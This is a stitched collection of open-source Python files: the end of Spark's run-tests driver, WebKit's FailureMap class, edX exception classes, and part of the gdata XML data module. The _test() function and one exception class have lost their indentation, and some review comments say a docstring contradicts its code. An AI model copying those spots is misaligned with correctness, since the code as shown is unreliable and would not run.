    """Run SparkR unit tests if R is on PATH; otherwise skip with a notice."""
    set_title_and_block("Running SparkR tests", "BLOCK_SPARKR_UNIT_TESTS")
    if not which("R"):
        print("Ignoring SparkR tests as R was not found in PATH")
        return
    run_cmd([os.path.join(SPARK_HOME, "R", "run-tests.sh")])
def parse_opts():
    """Parse command-line options; only -p/--parallelism is supported."""
    parser = OptionParser(prog="run-tests")
    parser.add_option(
        "-p", "--parallelism", type="int", default=4,
        help="The number of suites to test in parallel (default %default)"
    )

    opts, args = parser.parse_args()
    if args:
        parser.error("Unsupported arguments: %s" % ' '.join(args))
    if opts.parallelism < 1:
        parser.error("Parallelism cannot be less than 1")
    return opts
def main():
    """Top-level driver: validate the environment, figure out which modules
    changed, run the license/style checks, build Spark, and run the Scala,
    Python and R test suites in that order."""
    opts = parse_opts()
    # Ensure the user home directory (HOME) is valid and is an absolute directory
    if not USER_HOME or not os.path.isabs(USER_HOME):
        print("[error] Cannot determine your home directory as an absolute path;",
              " ensure the $HOME environment variable is set properly.")
        sys.exit(1)

    os.chdir(SPARK_HOME)

    # Clear leftover state from previous runs: work dir and locally published jars.
    rm_r(os.path.join(SPARK_HOME, "work"))
    rm_r(os.path.join(USER_HOME, ".ivy2", "local", "org.apache.spark"))
    rm_r(os.path.join(USER_HOME, ".ivy2", "cache", "org.apache.spark"))

    os.environ["CURRENT_BLOCK"] = str(ERROR_CODES["BLOCK_GENERAL"])

    java_exe = determine_java_executable()

    if not java_exe:
        print("[error] Cannot find a version of `java` on the system; please",
              " install one and retry.")
        sys.exit(2)

    # NOTE(review): java_version is never read afterwards — confirm whether the
    # version check was meant to gate anything, or drop the assignment.
    java_version = determine_java_version(java_exe)

    # install SparkR
    if which("R"):
        run_cmd([os.path.join(SPARK_HOME, "R", "install-dev.sh")])
    else:
        print("Cannot install SparkR as R was not found in PATH")

    if os.environ.get("AMPLAB_JENKINS"):
        # if we're on the Amplab Jenkins build servers setup variables
        # to reflect the environment settings
        build_tool = os.environ.get("AMPLAB_JENKINS_BUILD_TOOL", "sbt")
        hadoop_version = os.environ.get("AMPLAB_JENKINS_BUILD_PROFILE", "hadoop2.6")
        test_env = "amplab_jenkins"
        # add path for Python3 in Jenkins if we're calling from a Jenkins machine
        os.environ["PATH"] = "/home/anaconda/envs/py3k/bin:" + os.environ.get("PATH")
    else:
        # else we're running locally and can use local settings
        build_tool = "sbt"
        hadoop_version = os.environ.get("HADOOP_PROFILE", "hadoop2.6")
        test_env = "local"

    print("[info] Using build tool", build_tool, "with Hadoop profile", hadoop_version,
          "under environment", test_env)

    changed_modules = None
    changed_files = None
    # Only pull-request builds on Jenkins can diff against a target branch.
    if test_env == "amplab_jenkins" and os.environ.get("AMP_JENKINS_PRB"):
        target_branch = os.environ["ghprbTargetBranch"]
        changed_files = identify_changed_files_from_git_commits("HEAD", target_branch=target_branch)
        changed_modules = determine_modules_for_files(changed_files)
        excluded_tags = determine_tags_to_exclude(changed_modules)

    if not changed_modules:
        # No diff information: treat everything as changed and exclude nothing.
        changed_modules = [modules.root]
        excluded_tags = []
    print("[info] Found the following changed modules:",
          ", ".join(x.name for x in changed_modules))

    # setup environment variables
    # note - the 'root' module doesn't collect environment variables for all modules. Because the
    # environment variables should not be set if a module is not changed, even if running the 'root'
    # module. So here we should use changed_modules rather than test_modules.
    test_environ = {}
    for m in changed_modules:
        test_environ.update(m.environ)
    setup_test_environ(test_environ)

    test_modules = determine_modules_to_test(changed_modules)

    # license checks
    run_apache_rat_checks()

    # style checks
    if not changed_files or any(f.endswith(".scala")
                                or f.endswith("scalastyle-config.xml")
                                for f in changed_files):
        run_scala_style_checks()
    if not changed_files or any(f.endswith(".java")
                                or f.endswith("checkstyle.xml")
                                or f.endswith("checkstyle-suppressions.xml")
                                for f in changed_files):
        # run_java_style_checks()
        pass
    if not changed_files or any(f.endswith(".py") for f in changed_files):
        run_python_style_checks()
    if not changed_files or any(f.endswith(".R") for f in changed_files):
        run_sparkr_style_checks()

    # determine if docs were changed and if we're inside the amplab environment
    # note - the below commented out until *all* Jenkins workers can get `jekyll` installed
    # if "DOCS" in changed_modules and test_env == "amplab_jenkins":
    #    build_spark_documentation()

    if any(m.should_run_build_tests for m in test_modules):
        run_build_tests()

    # spark build
    build_apache_spark(build_tool, hadoop_version)

    # backwards compatibility checks
    if build_tool == "sbt":
        # Note: compatibility tests only supported in sbt for now
        detect_binary_inop_with_mima(hadoop_version)
        # Since we did not build assembly/package before running dev/mima, we need to
        # do it here because the tests still rely on it; see SPARK-13294 for details.
        build_spark_assembly_sbt(hadoop_version)

    # run the test suites
    run_scala_tests(build_tool, hadoop_version, test_modules, excluded_tags)

    modules_with_python_tests = [m for m in test_modules if m.python_test_goals]
    if modules_with_python_tests:
        run_python_tests(modules_with_python_tests, opts.parallelism)
        run_python_packaging_tests()
    if any(m.should_run_r_tests for m in test_modules):
        run_sparkr_tests()
def _test():
import doctest
failure_count = doctest.testmod()[0]
if failure_count:
exit(-1)
if __name__ == "__main__":
    # Self-check this script's doctests first, then run the full test pipeline.
    _test()
    main()
| apache-2.0 |
webmull/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/net/failuremap.py | 134 | 4062 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# FIXME: This probably belongs in the buildbot module.
class FailureMap(object):
    """Accumulates builder failures together with the revision windows that
    could have caused them.

    Each failure is a dict with a 'builder' (exposing name()) and a
    'regression_window' (exposing revisions() and failing_tests()).
    """

    def __init__(self):
        self._failures = []

    def add_regression_window(self, builder, regression_window):
        """Record that builder regressed somewhere inside regression_window."""
        self._failures.append({
            'builder': builder,
            'regression_window': regression_window,
        })

    def is_empty(self):
        return not self._failures

    def failing_revisions(self):
        """Return a sorted, de-duplicated list of all implicated revisions."""
        failing_revisions = [failure_info['regression_window'].revisions()
                             for failure_info in self._failures]
        return sorted(set(sum(failing_revisions, [])))

    def builders_failing_for(self, revision):
        return self._builders_failing_because_of([revision])

    def tests_failing_for(self, revision):
        """Return a sorted list of tests failing in windows containing revision."""
        tests = [failure_info['regression_window'].failing_tests()
                 for failure_info in self._failures
                 if revision in failure_info['regression_window'].revisions()
                 and failure_info['regression_window'].failing_tests()]
        result = set()
        for test in tests:
            result = result.union(test)
        return sorted(result)

    def failing_tests(self):
        return set(sum([self.tests_failing_for(revision) for revision in self.failing_revisions()], []))

    def _old_failures(self, is_old_failure):
        # A list comprehension (rather than filter() + lambda) keeps the result
        # a concrete list under Python 3, where filter() returns an iterator.
        return [revision for revision in self.failing_revisions()
                if is_old_failure(revision)]

    def _builders_failing_because_of(self, revisions):
        revision_set = set(revisions)
        return [failure_info['builder'] for failure_info in self._failures
                if revision_set.intersection(
                    failure_info['regression_window'].revisions())]

    # FIXME: We should re-process old failures after some time delay.
    # https://bugs.webkit.org/show_bug.cgi?id=36581
    def filter_out_old_failures(self, is_old_failure):
        """Drop failures whose builders could be failing because of revisions
        that is_old_failure() classifies as already known."""
        old_failures = self._old_failures(is_old_failure)
        old_failing_builder_names = set([builder.name()
            for builder in self._builders_failing_because_of(old_failures)])

        # We filter out all the failing builders that could have been caused
        # by old_failures.  We could miss some new failures this way, but
        # empirically, this reduces the amount of spam we generate.
        failures = self._failures
        self._failures = [failure_info for failure_info in failures
            if failure_info['builder'].name() not in old_failing_builder_names]
        # NOTE(review): _cache is only ever assigned here, never read or set in
        # __init__ — it appears vestigial; kept for compatibility.
        self._cache = {}
| bsd-3-clause |
gymnasium/edx-platform | common/lib/xmodule/xmodule/exceptions.py | 22 | 1266 | class InvalidDefinitionError(Exception):
pass
class NotFoundError(Exception):
    """Raised when a requested item cannot be found in the store."""
    pass
class ProcessingError(Exception):
    '''
    An error occurred while processing a request to the XModule.
    For example: if an exception occurs while checking a capa problem.
    '''
    pass
class InvalidVersionError(Exception):
    """
    Tried to save an item with a location that a store cannot support (e.g., draft version
    for a non-leaf node)
    """
    def __init__(self, location):
        super(InvalidVersionError, self).__init__()
        # The rejected location, kept so callers can report or inspect it.
        self.location = location
class SerializationError(Exception):
    """
    Thrown when a module cannot be exported to XML
    """
    def __init__(self, location, msg):
        super(SerializationError, self).__init__(msg)
        # Location of the module that failed to serialize.
        self.location = location
class UndefinedContext(Exception):
    """
    Tried to access an xmodule field which needs a different context (runtime) to have a value.
    """
    pass
class HeartbeatFailure(Exception):
    """
    Raised when heartbeat fails.
    """
    def __init__(self, msg, service):
        """
        In addition to a msg, provide the name of the service.
        """
        # Name of the failing service, as supplied by the caller.
        self.service = service
        super(HeartbeatFailure, self).__init__(msg)
| agpl-3.0 |
pforret/python-for-android | python3-alpha/python-libs/gdata/data.py | 127 | 39947 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is used for version 2 of the Google Data APIs.
"""Provides classes and constants for the XML in the Google Data namespace.
Documentation for the raw XML which these classes represent can be found here:
http://code.google.com/apis/gdata/docs/2.0/elements.html
"""
__author__ = 'j.s@google.com (Jeff Scudder)'
import os
import atom.core
import atom.data
GDATA_TEMPLATE = '{http://schemas.google.com/g/2005}%s'
GD_TEMPLATE = GDATA_TEMPLATE
OPENSEARCH_TEMPLATE_V1 = '{http://a9.com/-/spec/opensearchrss/1.0/}%s'
OPENSEARCH_TEMPLATE_V2 = '{http://a9.com/-/spec/opensearch/1.1/}%s'
BATCH_TEMPLATE = '{http://schemas.google.com/gdata/batch}%s'
# Labels used in batch request entries to specify the desired CRUD operation.
BATCH_INSERT = 'insert'
BATCH_UPDATE = 'update'
BATCH_DELETE = 'delete'
BATCH_QUERY = 'query'
EVENT_LOCATION = 'http://schemas.google.com/g/2005#event'
ALTERNATE_LOCATION = 'http://schemas.google.com/g/2005#event.alternate'
PARKING_LOCATION = 'http://schemas.google.com/g/2005#event.parking'
CANCELED_EVENT = 'http://schemas.google.com/g/2005#event.canceled'
CONFIRMED_EVENT = 'http://schemas.google.com/g/2005#event.confirmed'
TENTATIVE_EVENT = 'http://schemas.google.com/g/2005#event.tentative'
CONFIDENTIAL_EVENT = 'http://schemas.google.com/g/2005#event.confidential'
DEFAULT_EVENT = 'http://schemas.google.com/g/2005#event.default'
PRIVATE_EVENT = 'http://schemas.google.com/g/2005#event.private'
PUBLIC_EVENT = 'http://schemas.google.com/g/2005#event.public'
OPAQUE_EVENT = 'http://schemas.google.com/g/2005#event.opaque'
TRANSPARENT_EVENT = 'http://schemas.google.com/g/2005#event.transparent'
CHAT_MESSAGE = 'http://schemas.google.com/g/2005#message.chat'
INBOX_MESSAGE = 'http://schemas.google.com/g/2005#message.inbox'
SENT_MESSAGE = 'http://schemas.google.com/g/2005#message.sent'
SPAM_MESSAGE = 'http://schemas.google.com/g/2005#message.spam'
STARRED_MESSAGE = 'http://schemas.google.com/g/2005#message.starred'
UNREAD_MESSAGE = 'http://schemas.google.com/g/2005#message.unread'
BCC_RECIPIENT = 'http://schemas.google.com/g/2005#message.bcc'
CC_RECIPIENT = 'http://schemas.google.com/g/2005#message.cc'
SENDER = 'http://schemas.google.com/g/2005#message.from'
REPLY_TO = 'http://schemas.google.com/g/2005#message.reply-to'
TO_RECIPIENT = 'http://schemas.google.com/g/2005#message.to'
ASSISTANT_REL = 'http://schemas.google.com/g/2005#assistant'
CALLBACK_REL = 'http://schemas.google.com/g/2005#callback'
CAR_REL = 'http://schemas.google.com/g/2005#car'
COMPANY_MAIN_REL = 'http://schemas.google.com/g/2005#company_main'
FAX_REL = 'http://schemas.google.com/g/2005#fax'
HOME_REL = 'http://schemas.google.com/g/2005#home'
HOME_FAX_REL = 'http://schemas.google.com/g/2005#home_fax'
ISDN_REL = 'http://schemas.google.com/g/2005#isdn'
MAIN_REL = 'http://schemas.google.com/g/2005#main'
MOBILE_REL = 'http://schemas.google.com/g/2005#mobile'
OTHER_REL = 'http://schemas.google.com/g/2005#other'
OTHER_FAX_REL = 'http://schemas.google.com/g/2005#other_fax'
PAGER_REL = 'http://schemas.google.com/g/2005#pager'
RADIO_REL = 'http://schemas.google.com/g/2005#radio'
TELEX_REL = 'http://schemas.google.com/g/2005#telex'
TTL_TDD_REL = 'http://schemas.google.com/g/2005#tty_tdd'
WORK_REL = 'http://schemas.google.com/g/2005#work'
WORK_FAX_REL = 'http://schemas.google.com/g/2005#work_fax'
WORK_MOBILE_REL = 'http://schemas.google.com/g/2005#work_mobile'
WORK_PAGER_REL = 'http://schemas.google.com/g/2005#work_pager'
NETMEETING_REL = 'http://schemas.google.com/g/2005#netmeeting'
OVERALL_REL = 'http://schemas.google.com/g/2005#overall'
PRICE_REL = 'http://schemas.google.com/g/2005#price'
QUALITY_REL = 'http://schemas.google.com/g/2005#quality'
EVENT_REL = 'http://schemas.google.com/g/2005#event'
EVENT_ALTERNATE_REL = 'http://schemas.google.com/g/2005#event.alternate'
EVENT_PARKING_REL = 'http://schemas.google.com/g/2005#event.parking'
AIM_PROTOCOL = 'http://schemas.google.com/g/2005#AIM'
MSN_PROTOCOL = 'http://schemas.google.com/g/2005#MSN'
YAHOO_MESSENGER_PROTOCOL = 'http://schemas.google.com/g/2005#YAHOO'
SKYPE_PROTOCOL = 'http://schemas.google.com/g/2005#SKYPE'
QQ_PROTOCOL = 'http://schemas.google.com/g/2005#QQ'
GOOGLE_TALK_PROTOCOL = 'http://schemas.google.com/g/2005#GOOGLE_TALK'
ICQ_PROTOCOL = 'http://schemas.google.com/g/2005#ICQ'
JABBER_PROTOCOL = 'http://schemas.google.com/g/2005#JABBER'
REGULAR_COMMENTS = 'http://schemas.google.com/g/2005#regular'
REVIEW_COMMENTS = 'http://schemas.google.com/g/2005#reviews'
MAIL_BOTH = 'http://schemas.google.com/g/2005#both'
MAIL_LETTERS = 'http://schemas.google.com/g/2005#letters'
MAIL_PARCELS = 'http://schemas.google.com/g/2005#parcels'
MAIL_NEITHER = 'http://schemas.google.com/g/2005#neither'
GENERAL_ADDRESS = 'http://schemas.google.com/g/2005#general'
LOCAL_ADDRESS = 'http://schemas.google.com/g/2005#local'
OPTIONAL_ATENDEE = 'http://schemas.google.com/g/2005#event.optional'
REQUIRED_ATENDEE = 'http://schemas.google.com/g/2005#event.required'
ATTENDEE_ACCEPTED = 'http://schemas.google.com/g/2005#event.accepted'
ATTENDEE_DECLINED = 'http://schemas.google.com/g/2005#event.declined'
ATTENDEE_INVITED = 'http://schemas.google.com/g/2005#event.invited'
ATTENDEE_TENTATIVE = 'http://schemas.google.com/g/2005#event.tentative'
FULL_PROJECTION = 'full'
VALUES_PROJECTION = 'values'
BASIC_PROJECTION = 'basic'
PRIVATE_VISIBILITY = 'private'
PUBLIC_VISIBILITY = 'public'
OPAQUE_TRANSPARENCY = 'http://schemas.google.com/g/2005#event.opaque'
TRANSPARENT_TRANSPARENCY = 'http://schemas.google.com/g/2005#event.transparent'
CONFIDENTIAL_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.confidential'
DEFAULT_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.default'
PRIVATE_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.private'
PUBLIC_EVENT_VISIBILITY = 'http://schemas.google.com/g/2005#event.public'
CANCELED_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.canceled'
CONFIRMED_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.confirmed'
TENTATIVE_EVENT_STATUS = 'http://schemas.google.com/g/2005#event.tentative'
ACL_REL = 'http://schemas.google.com/acl/2007#accessControlList'
class Error(Exception):
    """Base exception for errors raised by this module."""
    pass
class MissingRequiredParameters(Error):
    """Raised when a batch operation is given neither an entry nor a URL."""
    pass
class LinkFinder(atom.data.LinkFinder):
    """Mixin used in Feed and Entry classes to simplify link lookups by type.

    Provides lookup methods for edit, edit-media, post, ACL and other special
    links which are common across Google Data APIs.
    """

    def find_html_link(self):
        """Finds the first link with rel of alternate and type of text/html."""
        html_link = self.get_html_link()
        if html_link is not None:
            return html_link.href
        return None

    FindHtmlLink = find_html_link

    def get_html_link(self):
        """Returns the first alternate text/html link object, or None."""
        for candidate in self.link:
            if candidate.rel == 'alternate' and candidate.type == 'text/html':
                return candidate
        return None

    GetHtmlLink = get_html_link

    def find_post_link(self):
        """Get the URL to which new entries should be POSTed.

        The POST target URL is used to insert new entries.

        Returns:
          A str for the URL in the link with a rel matching the POST type.
        """
        return self.find_url('http://schemas.google.com/g/2005#post')

    FindPostLink = find_post_link

    def get_post_link(self):
        return self.get_link('http://schemas.google.com/g/2005#post')

    GetPostLink = get_post_link

    def find_acl_link(self):
        acl_link = self.get_acl_link()
        return acl_link.href if acl_link else None

    FindAclLink = find_acl_link

    def get_acl_link(self):
        """Searches for a link or feed_link (if present) with the rel for ACL."""
        direct_link = self.get_link(ACL_REL)
        if direct_link:
            return direct_link
        # Some entry types carry the ACL link as a nested feed_link instead.
        for nested_link in getattr(self, 'feed_link', []):
            if nested_link.rel == ACL_REL:
                return nested_link
        return None

    GetAclLink = get_acl_link

    def find_feed_link(self):
        return self.find_url('http://schemas.google.com/g/2005#feed')

    FindFeedLink = find_feed_link

    def get_feed_link(self):
        return self.get_link('http://schemas.google.com/g/2005#feed')

    GetFeedLink = get_feed_link

    def find_previous_link(self):
        return self.find_url('previous')

    FindPreviousLink = find_previous_link

    def get_previous_link(self):
        return self.get_link('previous')

    GetPreviousLink = get_previous_link
class TotalResults(atom.core.XmlElement):
    """opensearch:TotalResults for a GData feed."""
    # Matched under either OpenSearch namespace version used in GData feeds.
    _qname = (OPENSEARCH_TEMPLATE_V1 % 'totalResults',
              OPENSEARCH_TEMPLATE_V2 % 'totalResults')
class StartIndex(atom.core.XmlElement):
    """The opensearch:startIndex element in GData feed."""
    # Matched under either OpenSearch namespace version used in GData feeds.
    _qname = (OPENSEARCH_TEMPLATE_V1 % 'startIndex',
              OPENSEARCH_TEMPLATE_V2 % 'startIndex')
class ItemsPerPage(atom.core.XmlElement):
    """The opensearch:itemsPerPage element in GData feed."""
    # Matched under either OpenSearch namespace version used in GData feeds.
    _qname = (OPENSEARCH_TEMPLATE_V1 % 'itemsPerPage',
              OPENSEARCH_TEMPLATE_V2 % 'itemsPerPage')
class ExtendedProperty(atom.core.XmlElement):
    """The Google Data extendedProperty element.

    Used to store arbitrary key-value information specific to your
    application. The value can either be a text string stored as an XML
    attribute (.value), or an XML node (XmlBlob) as a child element.

    This element is used in the Google Calendar data API and the Google
    Contacts data API.
    """
    _qname = GDATA_TEMPLATE % 'extendedProperty'
    name = 'name'
    value = 'value'

    def get_xml_blob(self):
        """Returns the XML blob as an atom.core.XmlElement.

        Returns:
          An XmlElement representing the blob's XML, or None if no
          blob was set.
        """
        if not self._other_elements:
            return None
        return self._other_elements[0]

    GetXmlBlob = get_xml_blob

    def set_xml_blob(self, blob):
        """Sets the contents of the extendedProperty to XML as a child node.

        Since the extendedProperty is only allowed one child element as an XML
        blob, setting the XML blob will erase any preexisting member elements
        in this object.

        Args:
          blob: str or atom.core.XmlElement representing the XML blob stored in
                the extendedProperty.
        """
        if isinstance(blob, atom.core.XmlElement):
            parsed_blob = blob
        else:
            parsed_blob = atom.core.parse(str(blob))
        # Replacing the whole list discards any preexisting child nodes.
        self._other_elements = [parsed_blob]

    SetXmlBlob = set_xml_blob
class GDEntry(atom.data.Entry, LinkFinder):
    """Extends Atom Entry to provide data processing"""
    etag = '{http://schemas.google.com/g/2005}etag'

    def get_id(self):
        """Returns the stripped text of the atom id, or None when unset."""
        if self.id is None or self.id.text is None:
            return None
        return self.id.text.strip()

    GetId = get_id

    def is_media(self):
        """True when the entry carries an edit-media link (a media entry)."""
        return bool(self.find_edit_media_link())

    IsMedia = is_media

    def find_media_link(self):
        """Returns the URL to the media content, if the entry is a media entry.

        Otherwise returns None.
        """
        return self.content.src if self.is_media() else None

    FindMediaLink = find_media_link
class GDFeed(atom.data.Feed, LinkFinder):
    """A Feed from a GData service."""
    etag = '{http://schemas.google.com/g/2005}etag'
    total_results = TotalResults
    start_index = StartIndex
    items_per_page = ItemsPerPage
    entry = [GDEntry]

    def get_id(self):
        """Returns the stripped text of the feed's atom id, or None."""
        feed_id = self.id
        if feed_id is None or feed_id.text is None:
            return None
        return feed_id.text.strip()

    GetId = get_id

    def get_generator(self):
        """Returns the stripped generator text, or None when absent."""
        generator = self.generator
        if not (generator and generator.text):
            return None
        return generator.text.strip()
class BatchId(atom.core.XmlElement):
    """Identifies a single operation in a batch request."""
    _qname = BATCH_TEMPLATE % 'id'
class BatchOperation(atom.core.XmlElement):
    """The CRUD operation which this batch entry represents."""
    _qname = BATCH_TEMPLATE % 'operation'
    # XML attribute naming the operation: 'insert', 'update', 'delete' or 'query'.
    type = 'type'
class BatchStatus(atom.core.XmlElement):
    """The batch:status element present in a batch response entry.

    A status element contains the code (HTTP response code) and
    reason as elements. In a single request these fields would
    be part of the HTTP response, but in a batch request each
    Entry operation has a corresponding Entry in the response
    feed which includes status information.

    See http://code.google.com/apis/gdata/batch.html#Handling_Errors
    """
    _qname = BATCH_TEMPLATE % 'status'
    # XML attributes carrying the per-operation HTTP-style result.
    code = 'code'
    reason = 'reason'
    content_type = 'content-type'
class BatchEntry(GDEntry):
    """An atom:entry for use in batch requests.

    The BatchEntry contains additional members to specify the operation to be
    performed on this entry and a batch ID so that the server can reference
    individual operations in the response feed. For more information, see:
    http://code.google.com/apis/gdata/batch.html
    """
    batch_operation = BatchOperation
    batch_id = BatchId
    batch_status = BatchStatus
class BatchInterrupted(atom.core.XmlElement):
    """The batch:interrupted element sent if batch request was interrupted.

    Only appears in a feed if some of the batch entries could not be processed.
    See: http://code.google.com/apis/gdata/batch.html#Handling_Errors
    """
    _qname = BATCH_TEMPLATE % 'interrupted'
    # XML attributes summarizing how far processing got before interruption.
    reason = 'reason'
    success = 'success'
    failures = 'failures'
    parsed = 'parsed'
class BatchFeed(GDFeed):
    """A feed containing a list of batch request entries."""
    interrupted = BatchInterrupted
    entry = [BatchEntry]
    def add_batch_entry(self, entry=None, id_url_string=None,
                        batch_id_string=None, operation_string=None):
        """Logic for populating members of a BatchEntry and adding to the feed.

        If the entry is not a BatchEntry, it is converted to a BatchEntry so
        that the batch specific members will be present.

        The id_url_string can be used in place of an entry if the batch operation
        applies to a URL. For example query and delete operations require just
        the URL of an entry, no body is sent in the HTTP request. If an
        id_url_string is sent instead of an entry, a BatchEntry is created and
        added to the feed.

        This method also assigns the desired batch id to the entry so that it
        can be referenced in the server's response. If the batch_id_string is
        None, this method will assign a batch_id to be the index at which this
        entry will be in the feed's entry list.

        Args:
          entry: BatchEntry, atom.data.Entry, or another Entry flavor (optional)
              The entry which will be sent to the server as part of the batch
              request. The item must have a valid atom id so that the server
              knows which entry this request references.
          id_url_string: str (optional) The URL of the entry to be acted on. You
              can find this URL in the text member of the atom id for an entry.
              If an entry is not sent, this id will be used to construct a new
              BatchEntry which will be added to the request feed.
          batch_id_string: str (optional) The batch ID to be used to reference
              this batch operation in the results feed. If this parameter is None,
              the current length of the feed's entry array will be used as a
              count. Note that batch_ids should either always be specified or
              never, mixing could potentially result in duplicate batch ids.
          operation_string: str (optional) The desired batch operation which will
              set the batch_operation.type member of the entry. Options are
              'insert', 'update', 'delete', and 'query'

        Raises:
          MissingRequiredParameters: Raised if neither an id_ url_string nor an
              entry are provided in the request.

        Returns:
          The added entry.
        """
        # NOTE(review): despite the docstring above, a non-BatchEntry `entry`
        # is NOT converted here; entries lacking batch_id/batch_operation
        # attributes would raise AttributeError below — confirm with upstream.
        if entry is None and id_url_string is None:
            raise MissingRequiredParameters('supply either an entry or URL string')
        if entry is None and id_url_string is not None:
            entry = BatchEntry(id=atom.data.Id(text=id_url_string))
        if batch_id_string is not None:
            entry.batch_id = BatchId(text=batch_id_string)
        elif entry.batch_id is None or entry.batch_id.text is None:
            # Default batch id: the entry's index in this feed's entry list.
            entry.batch_id = BatchId(text=str(len(self.entry)))
        if operation_string is not None:
            entry.batch_operation = BatchOperation(type=operation_string)
        self.entry.append(entry)
        return entry
    AddBatchEntry = add_batch_entry
    def add_insert(self, entry, batch_id_string=None):
        """Add an insert request to the operations in this batch request feed.

        If the entry doesn't yet have an operation or a batch id, these will
        be set to the insert operation and a batch_id specified as a parameter.

        Args:
          entry: BatchEntry The entry which will be sent in the batch feed as an
              insert request.
          batch_id_string: str (optional) The batch ID to be used to reference
              this batch operation in the results feed. If this parameter is None,
              the current length of the feed's entry array will be used as a
              count. Note that batch_ids should either always be specified or
              never, mixing could potentially result in duplicate batch ids.
        """
        self.add_batch_entry(entry=entry, batch_id_string=batch_id_string,
                             operation_string=BATCH_INSERT)
    AddInsert = add_insert
    def add_update(self, entry, batch_id_string=None):
        """Add an update request to the list of batch operations in this feed.

        Sets the operation type of the entry to insert if it is not already set
        and assigns the desired batch id to the entry so that it can be
        referenced in the server's response.

        Args:
          entry: BatchEntry The entry which will be sent to the server as an
              update (HTTP PUT) request. The item must have a valid atom id
              so that the server knows which entry to replace.
          batch_id_string: str (optional) The batch ID to be used to reference
              this batch operation in the results feed. If this parameter is None,
              the current length of the feed's entry array will be used as a
              count. See also comments for AddInsert.
        """
        self.add_batch_entry(entry=entry, batch_id_string=batch_id_string,
                             operation_string=BATCH_UPDATE)
    AddUpdate = add_update
    def add_delete(self, url_string=None, entry=None, batch_id_string=None):
        """Adds a delete request to the batch request feed.

        This method takes either the url_string which is the atom id of the item
        to be deleted, or the entry itself. The atom id of the entry must be
        present so that the server knows which entry should be deleted.

        Args:
          url_string: str (optional) The URL of the entry to be deleted. You can
              find this URL in the text member of the atom id for an entry.
          entry: BatchEntry (optional) The entry to be deleted.
          batch_id_string: str (optional)

        Raises:
          MissingRequiredParameters: Raised if neither a url_string nor an entry
              are provided in the request.
        """
        self.add_batch_entry(entry=entry, id_url_string=url_string,
                             batch_id_string=batch_id_string, operation_string=BATCH_DELETE)
    AddDelete = add_delete
    def add_query(self, url_string=None, entry=None, batch_id_string=None):
        """Adds a query request to the batch request feed.

        This method takes either the url_string which is the query URL
        whose results will be added to the result feed. The query URL will
        be encapsulated in a BatchEntry, and you may pass in the BatchEntry
        with a query URL instead of sending a url_string.

        Args:
          url_string: str (optional)
          entry: BatchEntry (optional)
          batch_id_string: str (optional)

        Raises:
          MissingRequiredParameters
        """
        self.add_batch_entry(entry=entry, id_url_string=url_string,
                             batch_id_string=batch_id_string, operation_string=BATCH_QUERY)
    AddQuery = add_query
    def find_batch_link(self):
        """Returns the URL of this feed's batch link, or None when absent."""
        return self.find_url('http://schemas.google.com/g/2005#batch')
    FindBatchLink = find_batch_link
class EntryLink(atom.core.XmlElement):
    """The gd:entryLink element.

    Represents a logically nested entry. For example, a <gd:who>
    representing a contact might have a nested entry from a contact feed.
    """
    _qname = GDATA_TEMPLATE % 'entryLink'
    entry = GDEntry
    # XML attributes of gd:entryLink.
    rel = 'rel'
    read_only = 'readOnly'
    href = 'href'
class FeedLink(atom.core.XmlElement):
    """The gd:feedLink element.

    Represents a logically nested feed. For example, a calendar feed might
    have a nested feed representing all comments on entries.
    """
    _qname = GDATA_TEMPLATE % 'feedLink'
    feed = GDFeed
    # XML attributes of gd:feedLink.
    rel = 'rel'
    read_only = 'readOnly'
    count_hint = 'countHint'
    href = 'href'
class AdditionalName(atom.core.XmlElement):
    """The gd:additionalName element.

    Specifies additional (eg. middle) name of the person.
    Contains an attribute for the phonetic representation of the name.
    """
    _qname = GDATA_TEMPLATE % 'additionalName'
    # Yomigana (phonetic reading) attribute.
    yomi = 'yomi'
class Comments(atom.core.XmlElement):
    """The gd:comments element.

    Contains a comments feed for the enclosing entry (such as a calendar event).
    """
    _qname = GDATA_TEMPLATE % 'comments'
    rel = 'rel'
    feed_link = FeedLink
class Country(atom.core.XmlElement):
    """The gd:country element.

    Country name along with optional country code. The country code is
    given in accordance with ISO 3166-1 alpha-2:
    http://www.iso.org/iso/iso-3166-1_decoding_table
    """
    _qname = GDATA_TEMPLATE % 'country'
    code = 'code'
